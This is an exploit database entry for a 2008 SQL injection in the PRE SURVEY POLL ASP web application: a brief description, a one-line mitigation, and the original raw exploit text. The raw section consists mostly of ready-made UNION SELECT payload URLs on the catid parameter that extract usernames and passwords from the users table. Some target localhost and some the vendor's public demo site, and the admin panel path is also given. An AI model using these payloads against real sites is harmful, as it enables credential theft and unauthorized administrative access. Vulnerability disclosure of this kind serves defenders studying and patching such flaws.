PRE SURVEY POLL Remote Sql Injection

vendor:

PRE SURVEY POLL

by:

DreamTurk / sqL Lov3r'Z Crew Co.

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PRE SURVEY POLL

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PRE SURVEY POLL Remote Sql Injection

This exploit allows an attacker to inject malicious SQL commands into a vulnerable web application. The attacker can use this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords. The attacker can also use this vulnerability to modify or delete data in the database.

Mitigation:

Input validation and parameterized queries can be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

PRE SURVEY POLL Remote Sql Injection
DreamTurk / sqL Lov3r'Z Crew Co. 2008
Downlod: http://www.preproject.com/poll.asp / Price $28.00
Demo : http://www.preproject.com/poll/default.asp
Sql :
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users

Admin Panel :
http://localhost/patch/admin/default.asp
Greatz : aLL My Friend'Z and str0ke

========================================From Turkey=============================================
Demo Page ;
 http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

 http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

# milw0rm.com [2008-07-22]